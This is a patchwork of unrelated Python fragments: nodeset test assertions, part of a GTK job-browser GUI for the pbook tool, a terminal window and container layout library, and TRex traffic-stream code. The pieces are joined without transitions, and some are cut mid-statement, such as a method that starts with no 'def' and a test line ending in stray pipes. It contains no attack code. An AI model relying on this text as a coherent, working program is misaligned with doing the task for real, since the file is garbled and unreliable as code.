self._nodeset_t(["--split=2","-r", "unknown2", "unknown3"], None, "unknown2\nunknown3\n")
self._nodeset_t(["-f", "-a"], None, "example[1-100]\n")
self._nodeset_t(["-f", "@moo"], None, "example[1-100]\n")
self._nodeset_t(["-f", "@moo", "@bar"], None, "example[1-100]\n")
self._nodeset_t(["-e", "-a"], None, ' '.join(["example%d" % i for i in range(1, 101)]) | |
import re
import os
import sys
import gtk
import time
import pango
import gobject
import gtk.glade
import threading
import commands
import Queue
import GlobalConfig
import PLogger
import LocalJobSpec
gobject.threads_init()
gtk.gdk.threads_init()
# thread to synchronize database in background
class Synchronizer(threading.Thread):
# constructor
def __init__(self,syncQueue,pEmitter):
# init thread
threading.Thread.__init__(self)
# queue
self.syncQueue = syncQueue
# try to get core
try:
self.pbookCore = self.syncQueue.get_nowait()
except:
self.pbookCore = None
# emitter
self.pEmitter = pEmitter
# run
def run(self):
if self.pbookCore == None:
return
# synchronize database
self.pbookCore.sync()
# put back queue
self.syncQueue.put(self.pbookCore)
# emit signal
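# (idle_add schedules the emit in the GTK main loop, so the signal is not
# fired from this worker thread)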
gobject.idle_add(self.pEmitter.emit,"on_syncEnd")
# thread to retry in background
class RetryWorker(threading.Thread):
# constructor
def __init__(self,jobID,guiGlobal,retryQueue,pEmitter):
# init thread
threading.Thread.__init__(self)
# JobID
self.jobID = jobID
# global data
self.guiGlobal = guiGlobal
# queue
self.retryQueue = retryQueue
# try to get core
try:
self.pbookCore = self.retryQueue.get_nowait()
except:
self.pbookCore = None
# emitter
self.pEmitter = pEmitter
# run
def run(self):
if self.pbookCore == None:
return
# retry
self.pbookCore.retry(long(self.jobID))
# put back queue
self.retryQueue.put(self.pbookCore)
# reset offset
self.guiGlobal.resetJobOffset()
# emit signal
gobject.idle_add(self.pEmitter.emit,"on_syncEnd")
# thread to open url
class UrlOpener(threading.Thread):
# constructor
def __init__(self,url,queue):
# init thread
threading.Thread.__init__(self)
# url
self.url = url
# queue
self.queue = queue
# browser type
self.browser = 'firefox'
# logger
self.tmpLog = PLogger.getPandaLogger()
# run
def run(self):
if self.browser == 'firefox':
# check application
status,output = commands.getstatusoutput('which %s' % self.browser)
if status != 0:
self.tmpLog.error('%s is unavailable' % self.browser)
return
# check version
status,output = commands.getstatusoutput('%s -v' % self.browser)
version = output.split()[2]
version = version[:-1]
if version < '2.0':
self.tmpLog.warning("too old %s : version %s It wouldn't work properly" % (self.browser,version))
# open url
com = '%s %s' % (self.browser,self.url)
commands.getstatusoutput(com)
# release queue
self.queue.put(True)
return
# global data
class PBookGuiGlobal:
# constructor
def __init__(self):
# list of jobs in local DB
self.jobMap = {}
# current JobID
self.currentJob = None
# current job offset
self.jobOffset = 0
# lock
self.lock = Queue.Queue(1)
self.lock.put(True)
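# the one-slot Queue acts as a simple mutex: get() blocks until the token is
# available and put() releases it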
# set job map
def setJobMap(self,jobMap):
lock = self.lock.get()
self.jobMap = jobMap
self.lock.put(lock)
# get job map
def getJobMap(self):
return self.jobMap
# set current job
def setCurrentJob(self,jobID):
lock = self.lock.get()
if self.jobMap.has_key(jobID):
self.currentJob = jobID
self.lock.put(lock)
# update job
def updateJob(self,job):
lock = self.lock.get()
if isinstance(job,LocalJobSpec.LocalJobSpec):
self.jobMap[job.JobID] = job
else:
self.jobMap[job.JobsetID] = job
self.lock.put(lock)
# get current job
def getCurrentJob(self):
return self.currentJob
# get job
def getJob(self,jobID):
return self.jobMap[jobID]
# reset offset of jobs
def resetJobOffset(self):
lock = self.lock.get()
# reset to 0
self.jobOffset = 0
self.lock.put(lock)
# set offset of jobs
def setJobOffset(self,change):
lock = self.lock.get()
# try
tmpOffset = self.jobOffset + change
# reset if out of range
if tmpOffset >= len(self.jobMap):
tmpOffset = self.jobOffset
elif tmpOffset < 0:
tmpOffset = 0
# set
self.jobOffset = tmpOffset
self.lock.put(lock)
# get offset
def getJobOffset(self):
return self.jobOffset
# jump to JobID
class PJumper:
# constructor
def __init__(self,guiGlobal,pEmitter):
# jobID to jump to
self.jobID = None
# global data
self.guiGlobal = guiGlobal
# emitter
self.pEmitter = pEmitter
# set jobID
def setJobID(self,jobID):
self.jobID = jobID
# action
def on_clicked(self,tag,textview,event,iter):
# mouse clicked
if event.type == gtk.gdk.BUTTON_PRESS:
if self.jobID != None:
# set jobID to global
self.guiGlobal.setCurrentJob(self.jobID)
# emit
self.pEmitter.emit("on_setNewJob")
# text view for summary
class PSumView:
# constructor
def __init__(self,sumView,guiGlobal,pEmitter):
# widget
self.sumView = sumView
# global data
self.guiGlobal = guiGlobal
# emitter
self.pEmitter = pEmitter
# jumper
self.jumper = {'retryID' : PJumper(self.guiGlobal,self.pEmitter),
'provenanceID' : PJumper(self.guiGlobal,self.pEmitter),
'retrySetID' : PJumper(self.guiGlobal,self.pEmitter),
'parentSetID' : PJumper(self.guiGlobal,self.pEmitter),
}
self.firstJump = {}
for tmpJumpName in self.jumper.keys():
self.firstJump[tmpJumpName] = True
# sizes
self.nLines = 20+1
self.nColumns = 4
# resize
self.sumView.resize(self.nLines,self.nColumns)
# create TextViews
self.allBufList = []
self.textViewMap = {}
for iLine in range(self.nLines):
bufList = []
for item in ('label','value'):
# text buffer
textBuf = gtk.TextBuffer()
# set tag
tag = textBuf.create_tag('default')
tag.set_property("font", "monospace")
tag = textBuf.create_tag('red')
tag.set_property("font", "monospace")
tag.set_property('foreground','red2')
tag = textBuf.create_tag('pink')
tag.set_property("font", "monospace")
tag.set_property('foreground','deeppink')
tag = textBuf.create_tag('green')
tag.set_property("font", "monospace")
tag.set_property('foreground','green4')
tag = textBuf.create_tag('yellow')
tag.set_property("font", "monospace")
tag.set_property('foreground','darkgoldenrod')
tag = textBuf.create_tag('navy')
tag.set_property("font", "monospace")
tag.set_property('foreground','navy')
tag = textBuf.create_tag('skyblue')
tag.set_property("font", "monospace")
tag.set_property('foreground','darkturquoise')
tag = textBuf.create_tag('purple')
tag.set_property("font", "monospace")
tag.set_property('foreground','blueviolet')
# create textview
textView = gtk.TextView(textBuf)
self.textViewMap[textBuf] = textView
# properties
textView.set_editable(False)
textView.set_cursor_visible(False)
# set size and justification
if item == 'label':
textView.set_size_request(120,-1)
textView.set_justification(gtk.JUSTIFY_RIGHT)
else:
textView.set_size_request(460,-1)
textView.set_justification(gtk.JUSTIFY_LEFT)
textView.set_right_margin(20)
# color
textView.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse("ghostwhite"))
# wrap mode
textView.set_wrap_mode(gtk.WRAP_CHAR)
# append
if item == 'label':
self.sumView.attach(textView,0,1,iLine,iLine+1)
else:
self.sumView.attach(textView,1,self.nColumns-1,iLine,iLine+1)
bufList.append(textBuf)
# append
self.allBufList.append(bufList)
# show
self.sumView.show_all()
# cursors
self.cursors = {'normal' : gtk.gdk.Cursor(gtk.gdk.XTERM),
'link' : gtk.gdk.Cursor(gtk.gdk.HAND2)
}
# show summary
def showJobInfo(self,widget):
# get job
jobID = self.guiGlobal.getCurrentJob()
job = self.guiGlobal.getJob(jobID)
# make string
strJob = "\n"
strJob += str(job)
strJob += "\n"
# split to lines
lines = strJob.split('\n')
# delete
for tmpBufList in self.allBufList:
for textbuf in tmpBufList:
# delete
textbuf.delete(textbuf.get_start_iter(),
textbuf.get_end_iter())
# fill
jobStatusRows = False
jobStatusLines = ''
jobStatusIdx = 0
for iLine in range(len(lines)):
# check limit
if iLine+1 > self.nLines:
continue
# decompose line to label and value
line = lines[iLine]
match = re.search('^([^:]+:)(.*)',line)
if match == None:
items = [line,'']
else:
items = match.groups()
# fill
if not jobStatusRows:
iItem = 0
for strLabel in items:
# remove redundant white spaces
strLabel = strLabel.strip()
strLabel += ' '
# get textbuffer
textbuf = self.allBufList[iLine][iItem]
# delete
textbuf.delete(textbuf.get_start_iter(),
textbuf.get_end_iter())
# set color
tagname = 'default'
if (line.strip().startswith('jobStatus') or line.strip().startswith('status')) and iItem != 0:
if strLabel.find('frozen') != -1:
tagname = 'navy'
elif strLabel.find('killing') != -1:
tagname = 'pink'
else:
tagname = 'skyblue'
# add jumper
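# fields such as retryID/provenanceID are rendered as hyperlinks; clicking one
# makes the corresponding PJumper select that JobID and emit on_setNewJob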
match = re.search('\s*(\S+)\s*:',line)
if match != None:
realLabel = match.group(1)
if self.jumper.has_key(realLabel) and iItem != 0:
# set jobID
jumper = self.jumper[realLabel]
jobID = strLabel.strip()
if jobID in ['0','']:
jumper.setJobID(None)
strLabel = ''
# change mouse cursor
self.textViewMap[textbuf].get_window(gtk.TEXT_WINDOW_TEXT).set_cursor(self.cursors['normal'])
else:
jumper.setJobID(jobID)
# set tagname
tagname = 'hyperlink'
# change mouse cursor
self.textViewMap[textbuf].get_window(gtk.TEXT_WINDOW_TEXT).set_cursor(self.cursors['link'])
# setup textview
if self.firstJump[realLabel]:
# add connection
tag = textbuf.create_tag("hyperlink",foreground='blue',
underline=pango.UNDERLINE_SINGLE)
tag.connect('event',jumper.on_clicked)
# disable first flag
self.firstJump[realLabel] = False
# write
textbuf.insert_with_tags_by_name(textbuf.get_end_iter(),
strLabel,tagname)
# increment
iItem += 1
if line.strip().startswith('jobStatus') or line.strip().startswith('status'):
jobStatusRows = True
jobStatusIdx = iLine +1
try:
# get textbuffer
textbuf = self.allBufList[iLine+1][1]
# delete
textbuf.delete(textbuf.get_start_iter(),
textbuf.get_end_iter())
except:
pass
else:
# get textbuffer
textbuf = self.allBufList[jobStatusIdx][1]
# change color
tagname = 'default'
if line.find('finished') != -1:
tagname = 'green'
elif line.find('failed') != -1:
tagname = 'red'
elif line.find('cancelled') != -1:
tagname = 'purple'
else:
tagname = 'yellow'
# reformat
items = line.strip().split()
if len(items) > 1:
strLine = '%10s : %s\n' % (items[0],items[-1])
else:
strLine = '\n'
textbuf.insert_with_tags_by_name(textbuf.get_end_iter(),
strLine,tagname)
# text view for status
class PStatView:
# constructor
def __init__(self,statView):
# text view
self.statView = statView
# text buffer
self.buffer = self.statView.get_buffer()
# tags
self.tags = {}
# info
tag = self.buffer.create_tag('INFO')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','blue')
self.tags['INFO'] = tag
# debug
tag = self.buffer.create_tag('DEBUG')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','black')
self.tags['DEBUG'] = tag
# warning
tag = self.buffer.create_tag('WARNING')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','orange')
self.tags['WARNING'] = tag
# error
tag = self.buffer.create_tag('ERROR')
tag.set_property("font", "monospace")
#tag.set_property("size-points", 10)
tag.set_property('foreground','red')
self.tags['ERROR'] = tag
# format
self.format = ' %7s : %s\n'
# dummy handlers
self.handlers = ['']
# set color
self.statView.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse("ghostwhite"))
# queue for serialization
self.queue = Queue.Queue(1)
self.queue.put(True)
# wrap mode
self.statView.set_wrap_mode(gtk.WRAP_CHAR)
# formatter
def formatter(self,level,msg):
# format
return self.format % (level,msg)
# write message with level
def write(self,level,msg):
# insert message
message = self.formatter(level,msg)
self.buffer.insert_with_tags_by_name(self.buffer.get_end_iter(),
message,level)
# scroll
mark = self.buffer.get_mark("insert")
self.statView.scroll_mark_onscreen(mark)
gtk.threads_leave()
# emulation for logging
def info(self,msg,withLock=False):
sem = self.queue.get()
if withLock:
self.write('INFO',msg)
else:
gobject.idle_add(self.write,'INFO',msg)
self.queue.put(sem)
# emulation for logging
def debug(self,msg):
sem = self.queue.get()
gobject.idle_add(self.write,'DEBUG',msg)
self.queue.put(sem)
# emulation for logging
def warning(self,msg):
sem = self.queue.get()
gobject.idle_add(self.write,'WARNING',msg)
self.queue.put(sem)
# emulation for logging
def error(self,msg):
sem = self.queue.get()
gobject.idle_add(self.write,'ERROR',msg)
self.queue.put(sem)
# tree view for job list
class PTreeView:
# constructor
def __init__(self,treeView,guiGlobal,pbookCore,pEmitter):
# tree view
self.treeView = treeView
# global data
self.guiGlobal = guiGlobal
# core of pbook
self.pbookCore = pbookCore
# emitter
self.pEmitter = pEmitter
# column names
self.columnNames = ['JobID','creationTime']
(self, child, row, update_list):
item = self.win_to_item_[child]
r, c = self._get_item_row_col(item)
if c is None:
# position not yet computed
return
ul = []
for u in update_list:
if isinstance(u, strip):
ul.append(strip(u.text, u.style_name, u.col + c))
elif isinstance(u, cursor_update):
ul.append(cursor_update(u.mode, u.row + r, u.col + c))
elif isinstance(u, style_update):
ul.append(style_update(u.col + c, u.width, u.restyler))
else:
raise error("boo")
self._write_updates(row + r, ul)
# container.set_item_visibility()
def set_item_visibility (self, win, visible = True, toggle = False):
'''
returns true if it should lose focus
'''
lose_focus = False
item = self.win_to_item_[win]
if toggle:
concealed = not item.concealed
else:
concealed = not visible
if item.concealed == concealed:
dmsg('{}.set_item_visibility({},v={},t={}) => leaving {} unchanged',
self, win, visible, toggle, win)
return lose_focus
# if concealing focused item, move focus
if self.focused_item is item and concealed:
if len(self.focusable_items_) == 1:
lose_focus = True
dmsg('{} concealing focused item {!r} => request losing focus!',
self, item)
else:
dmsg('{}.set_item_visibility({}) => concealing focused item... cycle focus',
self, win)
dmsg('state: {!r}', self)
self.cycle_focus(in_depth = False, wrap_around = True)
if concealed: self._del_focusable_item(item)
else: self._add_focusable_item(item)
dmsg('{}.set_item_visibility({}) => visible={}, resizing...',
self, win, not concealed)
item.concealed = concealed
self.resize()
if self.focused_item is item:
# there was only this item in the container and it had focus
# cycle_focus returned the focus back to this
# we have to tell caller to change focus to something else
self.focused_item = None
return True
return False
# container._locate_item_by_pos()
def _locate_item_by_pos (self, pos):
for i in range(len(self.items_)):
item = self.items_[i]
if pos >= item.pos and pos - item.pos < item.size:
return (item, i)
return (None, None)
# container.del_at_index()
def del_at_index (self, idx):
parent_refocus = False
if idx >= len(self.items_): raise error('boo')
item = self.items_[idx]
item.win.detach()
assert item.index == idx
if self.focused_item is item:
self.cycle_focus(in_depth = False, wrap_around = True)
if self.focused_item is item:
self.focused_item = None
parent_refocus = True
del self.items_[idx]
assert self.focusable_items_[item.focusable_index] == item
del self.focusable_items_[item.focusable_index]
self._update_item_indices(idx)
self._update_focusable_item_indices(item.focusable_index)
return parent_refocus
# container.is_horizontal()
def is_horizontal (self):
return self.direction == container.HORIZONTAL
# container.is_vertical()
def is_vertical (self):
return self.direction == container.VERTICAL
# container._forget_item_locations()
def _forget_item_locations (self):
for item in self.items_:
item.pos = 0
item.size = 0
# container._compute_weight_of_unsized_items()
def _compute_weight_of_unsized_items (self):
weight = 0
for item in self.items_:
if item.concealed: continue
weight += item.weight
return weight
# container._compute_min_size()
def _compute_min_size (self):
min_size = 0
for item in self.items_:
if item.concealed: continue
min_size += item.min_size
return min_size
# container._compute_position_of_items()
def _compute_position_of_items (self):
pos = 0
for item in self.items_:
item.pos = pos
pos += item.size
dmsg('{}.items: {!r}', self, self.items_)
# container.is_focusable()
def is_focusable (self):
return self.can_have_focus and self.focusable_items_
# container._get_item_row_col()
def _get_item_row_col (self, item):
if self.is_vertical(): return (item.pos, 0)
elif self.is_horizontal(): return (0, item.pos)
# container.on_focus_leave()
def on_focus_leave (self):
dmsg('{}.on_focus_leave: focused={!r}', self, self.focused_item)
if self.focused_item:
item = self.focused_item
item.window.focus(False)
# container.on_focus_enter()
def on_focus_enter (self):
dmsg('{}.on_focus_enter', self)
if self.focused_item is None:
self.cycle_focus()
else:
item = self.focused_item
item.window.focus()
# container.focus_to()
def focus_to (self, win):
dmsg('{}: requested to focus on {}', self, win)
if window.focus_to(self, win): return True
dmsg('trying to focus on sub-items: {!r}', self.focusable_items_)
for item in self.focusable_items_:
if item.window.focus_to(win):
dmsg('{}: item #{!r} focused! prev_focused={!r}',
self, item, self.focused_item)
if self.focused_item and self.focused_item is not item:
self.focused_item.window.focus(False)
self.focused_item = item
dmsg('{}.focused_item = {!r}', self, item)
self.in_focus = True
return True
return False
# container.cycle_focus()
def cycle_focus (self, in_depth = True, wrap_around = False):
dmsg('{}.cycle_focus: focused_item={!r}', self, self.focused_item)
if self.focused_item:
item = self.focused_item
if in_depth and hasattr(item.window, 'cycle_focus'):
dmsg('{}: try cycle_focus on subitem: {!r}', self, item)
if item.window.cycle_focus(in_depth = True):
return True
dmsg('{} - remove focus for {!r}', self, item)
item.window.focus(False)
s = self.focused_item.focusable_index + 1 if self.focused_item else 0
dmsg('s={}', s)
if s >= len(self.focusable_items_):
if wrap_around: s = 0
dmsg('s={}', s)
if s >= len(self.focusable_items_):
self.focused_item = None
dmsg('abandon focus')
return False
self.focused_item = self.focusable_items_[s]
self.focused_item.window.focus(True)
return True
# container._size_to_weight_height()
def _size_to_weight_height (self, size):
if self.direction == container.HORIZONTAL: return (size, self.height)
elif self.direction == container.VERTICAL: return (self.width, size)
else: raise error('bad dir: {}', self.direction)
# container.on_resize()
def on_resize (self, width, height):
if self.direction == container.HORIZONTAL: size = width
elif self.direction == container.VERTICAL: size = height
else: raise error('bad dir: {}', self.direction)
self._forget_item_locations()
min_size = self._compute_min_size()
dmsg('{} resize({}x{}): min_size={} size={}',
self, width, height, min_size, size)
if size < min_size and self.focused_item:
self.focused_item.size = min(size, self.focused_item.max_size)
items_to_place = [item for item in self.items_ if not item.concealed]
items_to_place.sort(key = lambda item: item.max_size - item.min_size)
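# items are placed most-constrained first (smallest max_size - min_size margin);
# whatever a clamped item cannot absorb is redistributed, since both the
# remaining size and total_weight shrink on every iteration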
total_weight = self._compute_weight_of_unsized_items()
for item in items_to_place:
dmsg('{}: {!r} => iw={} tw={}', self, item, item.weight, total_weight)
item.size = saturate(round(size * item.weight / total_weight), item.min_size, item.max_size)
size -= item.size
total_weight -= item.weight
self._compute_position_of_items()
lp = 0
for item in self.items_:
if item.concealed: continue
wh = self._size_to_weight_height(item.size)
dmsg('{}: resizing {!r} to {}', self, item, wh)
item.window.resize(*wh)
rc = self._get_item_row_col(item)
lp = item.pos + item.size
#if lp < size: self.refresh()
return
# container.input_timeout()
def input_timeout (self):
self.on_input_timeout()
for item in self.items_:
item.window.input_timeout()
# container.refresh_strip()
def refresh_strip (self, row, col, width):
dmsg('{}.refresh_strip(row={}, col={}, width={})', self, row, col, width)
if self.is_vertical():
item, idx = self._locate_item_by_pos(row)
if item:
item.window.refresh(row - item.pos, col, 1, width)
return
elif self.is_horizontal():
item, idx = self._locate_item_by_pos(col)
end_col = col + width
while col < end_col and item:
w = min(item.size, width)
item.window.refresh(row, col - item.pos, 1, w)
col += item.size
width -= w
idx += 1
item = self.items_[idx] if idx < len(self.items_) else None
# if not covered till the end, fall back to the default window refresh
if width:
window.refresh(self, row, col, 1, width)
return
# container.pre_key()
# Overload this if your container needs to process keys before sending them to children
def pre_key (self, key):
return False
# container.post_key()
# Overload this if your container needs to process keys unprocessed by its children
def post_key (self, key):
return False
# container.on_key()
def on_key (self, key):
if self.pre_key(key):
return True
if self.focused_item:
key_handled = self.focused_item.window.on_key(key)
else:
dmsg('{}: dropping {!r} due to unfocused item', self, key)
key_handled = True
if not key_handled:
key_handled = self.post_key(key)
return key_handled
# class container - end
#* vcontainer ***************************************************************
def vcontainer (**b):
return container(direction = container.VERTICAL, **b)
#* hcontainer ***************************************************************
def hcontainer (**b):
return container(direction = container.HORIZONTAL, **b)
#* cc_window ****************************************************************
class cc_window (window):
'''
Cached-content window.
This window caches the content that needs displaying.
When refresh() or refresh_strip() is called it just
provides the relevant portion of the cache.
'''
# cc_window.__init__()
def __init__ (self,
wid = None,
init_content = None,
styles = 'default',
active_styles = None,
can_have_focus = False):
window.__init__(self,
wid = wid,
can_have_focus = can_have_focus,
styles = styles,
active_styles = active_styles)
self.content = []
self.top_row = 0
self.auto_scroll = True
if init_content: self.set_content(0, init_content)
# cc_window.general_out()
def general_out (self, text):
self.set_content(len(self.content), text)
# cc_window.set_content()
def set_content (self, row, text):
'''updates the cached content. No need to overload this!'''
l = text.splitlines()
while row > len(self.content):
self.content.append('')
self.content[row : row + len(l)] = l
if self.height > 0 and self.auto_scroll and len(self.content) > self.height:
self.top_row = len(self.content) - self.height
dmsg('got content:\n{}', '\n'.join([repr(x) for x in self.content]))
self.refresh()
# cc_window.scroll()
# If the window has a height then we can scroll its contents up and down
# while disabling the auto_scroll at the same time
def scroll (self, delta):
if self.height > 0:
tmp_top_row = self.top_row + delta
if tmp_top_row < 0 or len(self.content) <= self.height:
tmp_top_row = 0
if len(self.content) > self.height and tmp_top_row > (len(self.content) - self.height):
tmp_top_row = len(self.content) - self.height
self.auto_scroll = False
self.top_row = tmp_top_row
self.refresh()
# cc_window.auto_scroll_on()
# enable auto-scrolling capability
def auto_scroll_on (self):
if self.height > 0:
if len(self.content) <= self.height:
self.top_row = 0
else:
self.top_row = len(self.content) - self.height
self.auto_scroll = True
self.refresh()
# cc_window.refresh_strip()
def refresh_strip (self, row, col, width):
#dmsg('cc_win: refresh row={} col={} width={}', row, col, width)
logical_row = self.top_row + row
if logical_row >= 0 and logical_row < len(self.content):
txt = self.sfmt(self.content[logical_row])
else:
txt = ''
#dmsg('{}: cc_win: refresh_strip with {!r}', self, txt)
w = compute_styled_text_width(txt)
if w < self.width: txt += self.sfmt(' ' * (self.width - w))
self.put(row, 0, txt, clip_col = col, clip_width = width)
# cc_window.regenerate_content()
def regenerate_content (self):
'''
Overload this if reflowing text is needed
'''
pass
# cc_window.on_resize()
def on_resize (self, width, height):
self.regenerate_content()
# if
if mac_src_override_by_pkt == None:
if not packet.is_default_src_mac():
int_mac_src_override_by_pkt = 1
else:
int_mac_src_override_by_pkt = int(mac_src_override_by_pkt);
if mac_dst_override_mode == None:
if not packet.is_default_dst_mac():
int_mac_dst_override_mode = STLStreamDstMAC_PKT
else:
int_mac_dst_override_mode = int(mac_dst_override_mode);
self.is_default_mac = not (int_mac_src_override_by_pkt or int_mac_dst_override_mode)
self.fields['flags'] = (int_mac_src_override_by_pkt&1) + ((int_mac_dst_override_mode&3)<<1) + (int(dummy_stream) << 3)
self.fields['action_count'] = action_count
# basic fields
self.fields['enabled'] = enabled
self.fields['self_start'] = self_start
self.fields['start_paused'] = start_paused
self.fields['isg'] = isg
self.fields['core_id'] = core_id
if random_seed !=0 :
self.fields['random_seed'] = random_seed # optional
# mode
self.fields['mode'] = mode.to_json()
self.mode_desc = str(mode)
# packet and VM
pkt_json = packet.to_json()
self.fields['packet'] = pkt_json['packet']
self.fields['vm'] = pkt_json['vm']
self.pkt = base64.b64decode(self.fields['packet']['binary'])
# this is heavy, calculate lazy
self.packet_desc = None
if not flow_stats:
self.fields['flow_stats'] = STLFlowStats.defaults()
else:
self.fields['flow_stats'] = flow_stats.to_json()
def __str__ (self):
s = "Stream Name: {0}\n".format(self.name)
s += "Stream Next: {0}\n".format(self.next)
s += "Stream JSON:\n{0}\n".format(json.dumps(self.fields, indent = 4, separators=(',', ': '), sort_keys = True))
return s
def get_id (self):
""" Get the stream id after resolution """
return self.id
def has_custom_mac_addr (self):
""" Return True if src or dst MAC were set as custom """
return not self.is_default_mac
def is_explicit_dst_mac(self):
return ((self.fields['flags'] >> 1) & 0x3) == STLStreamDstMAC_PKT
def get_name (self):
""" Get the stream name """
return self.name
def get_next (self):
""" Get next stream object """
return self.next
def has_flow_stats (self):
""" Return True if stream was configured with flow stats """
return self.fields['flow_stats']['enabled']
def get_pg_id (self):
""" Returns packet group ID if exists """
return self.fields['flow_stats'].get('stream_id')
def get_flow_stats_type (self):
""" Returns flow stats type if exists """
return self.fields['flow_stats'].get('rule_type')
def get_pkt (self):
""" Get packet as string """
return self.pkt
def get_pkt_len (self, count_crc = True):
""" Get packet number of bytes """
pkt_len = len(self.get_pkt())
if count_crc:
pkt_len += 4
return pkt_len
def is_dummy (self):
""" return true if stream is marked as dummy stream """
return ( (self.fields['flags'] & 0x8) == 0x8 )
def get_pkt_type (self):
""" Get packet description. Example: IP:UDP """
if self.is_dummy():
return '-'
elif self.packet_desc == None:
self.packet_desc = STLPktBuilder.pkt_layers_desc_from_buffer(self.get_pkt())
return self.packet_desc
def get_mode (self):
return 'delay' if self.is_dummy() else self.mode_desc
@staticmethod
def get_rate_from_field (rate_json):
""" Get rate from json """
t = rate_json['type']
v = rate_json['value']
if t == "pps":
return format_num(v, suffix = "pps")
elif t == "bps_L1":
return format_num(v, suffix = "bps (L1)")
elif t == "bps_L2":
return format_num(v, suffix = "bps (L2)")
elif t == "percentage":
return format_num(v, suffix = "%")
def get_rate (self):
return self.get_rate_from_field(self.fields['mode']['rate'])
def to_pkt_dump (self):
""" Print packet description from Scapy """
if self.name:
print("Stream Name: ",self.name)
scapy_b = self.scapy_pkt_builder;
if scapy_b and isinstance(scapy_b,STLPktBuilder):
scapy_b.to_pkt_dump()
else:
print("Nothing to dump")
# return True if FE variable is being written only to IP src or dst, to show its value as IP
@staticmethod
def __is_all_IP(vm_var_usage_list):
for offsets_tuple in vm_var_usage_list:
if type(offsets_tuple) is not tuple:
return False
if offsets_tuple[0] != 'IP' or offsets_tuple[2] not in ('src', 'dst'):
return False
return True
# replace offset number by user-friendly string 'IP.src' etc.
@staticmethod
def __fix_offset_by_name(pkt, inst, name):
if name in inst:
ret = pkt.get_field_by_offset(inst[name])
if ret:
if inst['type'] in ('fix_checksum_ipv4', 'fix_checksum_hw', 'fix_checksum_icmpv6'): # do not include field name
if ret[1] == 0: # layer index is redundant
inst[name] = "'%s'" % ret[0]
else:
inst[name] = "'%s:%s'" % ret[0:2]
else:
if ret[1] == 0:
inst[name] = "'%s.%s'" % (ret[0], ret[2])
else:
inst[name] = "'%s:%s.%s'" % ret[0:3]
# returns the Python code (text) to build this stream, inside the code it will be in variable "stream"
def to_code(self):
""" Convert to Python code as profile """
layer = Ether(self.pkt)
pkt = CTRexScapyPktUtl(layer)
vm_var_usage = {}
for inst in self.fields['vm']['instructions']:
if inst['type'] == 'trim_pkt_size':
fv_name = inst['name']
if fv_name in vm_var_usage:
vm_var_usage[fv_name].append('trim')
else:
vm_var_usage[fv_name] = ['trim']
if 'pkt_offset' in inst:
fv_name = inst.get('fv_name', inst.get('name'))
if fv_name in vm_var_usage:
vm_var_usage[fv_name].append(pkt.get_field_by_offset(inst['pkt_offset']))
else:
vm_var_usage[fv_name] = [pkt.get_field_by_offset(inst['pkt_offset'])]
vm_list = ['vm = STLVM()']
for inst in self.fields['vm']['instructions']:
inst = dict(inst)
#print inst
self.__fix_offset_by_name(pkt, inst, 'pkt_offset')
if 'is_big_endian' in inst:
inst['byte_order'] = "'big'" if inst['is_big_endian'] else "'little'"
if inst['type'] == 'flow_var':
value_list = inst.get('value_list')
if inst['name'] in vm_var_usage and inst['size'] == 4 and self.__is_all_IP(vm_var_usage[inst['name']]):
if value_list is not None:
inst['value_list'] = ['%s' % ltoa(val) for val in value_list]
else:
inst['init_value'] = "'%s'" % ltoa(inst['init_value'])
inst['min_value'] = "'%s'" % ltoa(inst['min_value'])
inst['max_value'] = "'%s'" % ltoa(inst['max_value'])
if inst['next_var']:
inst['next_var'] = "'%s'" % inst['next_var']
common_start = "vm.var(name='{name}', op='{op}', step={step}, size={size}, split_to_cores={split_to_cores}, next_var={next_var}, "
if value_list is not None:
vm_list.append((common_start + "min_value=None, max_value=None, value_list={value_list})").format(**inst))
else:
vm_list.append((common_start + "min_value={min_value}, max_value={max_value}, init_value={init_value})").format(**inst))
elif inst['type'] == 'write_flow_var':
vm_list.append("vm.write(fv_name='{name}', pkt_offset={pkt_offset}, add_val={add_value}, byte_order={byte_order})".format(**inst))
elif inst['type'] == 'write_mask_flow_var':
inst['mask'] = hex(inst['mask'])
vm_list.append("vm.write_mask(fv_name='{name}', pkt_offset={pkt_offset}, pkt_cast_size={pkt_cast_size}, mask={mask}, shift={shift}, add_val={add_value}, byte_order={byte_order})".format(**inst))
elif inst['type'] == 'fix_checksum_ipv4':
vm_list.append("vm.fix_chksum(offset={pkt_offset})".format(**inst))
elif inst['type'] == 'fix_checksum_hw':
inst['l3_offset'] = inst['l2_len']
inst['l4_offset'] = inst['l2_len'] + inst['l3_len']
self.__fix_offset_by_name(pkt, inst, 'l3_offset')
self.__fix_offset_by_name(pkt, inst, 'l4_offset')
vm_list.append("vm.fix_chksum_hw(l3_offset={l3_offset}, l4_offset={l4_offset}, l4_type={l4_type})".format(**inst))
elif inst['type'] == 'fix_checksum_icmpv6':
inst['l3_offset'] = inst['l2_len']
inst['l4_offset'] = inst['l2_len'] + inst['l3_len']
self.__fix_offset_by_name(pkt, inst, 'l3_offset')
self.__fix_offset_by_name(pkt, inst, 'l4_offset')
vm_list.append("vm.fix_chksum_icmpv6(l3_offset={l3_offset}, l4_offset={l4_offset})".format(**inst))
elif inst['type'] == 'trim_pkt_size':
vm_list.append("vm.trim(fv_name='{name}')".format(**inst))
elif inst['type'] == 'tuple_flow_var':
inst['ip_min'] = ltoa(inst['ip_min'])
inst['ip_max'] = ltoa(inst['ip_max'])
vm_list.append("vm.tuple_var(name='{name}', ip_min='{ip_min}', ip_max='{ip_max}', port_min={port_min}, port_max={port_max}, limit_flows={limit_flows}, flags={flags})".format(**inst))
elif inst['type'] == 'flow_var_rand_limit':
if inst['next_var']:
inst['next_var'] = "'%s'" % inst['next_var']
vm_list.append("vm.repeatable_random_var(fv_name='{name}', size={size}, limit={limit}, seed={seed}, min_value={min_value}, max_value={max_value}, split_to_cores={split_to_cores}, next_var={next_var})".format(**inst))
else:
raise TRexError('Got unhandled FE instruction type: %s' % inst['type'])
if 'cache' in self.fields['vm']:
vm_list.append('vm.set_cached(%s)' % self.fields['vm']['cache'])
vm_code = '\n'.join(vm_list)
stream_params_list = []
stream_params_list.append('packet = STLPktBuilder(pkt = packet, vm = vm)')
if default_STLStream.name != self.name:
stream_params_list.append('name = %s' % STLStream.__add_quotes(self.name))
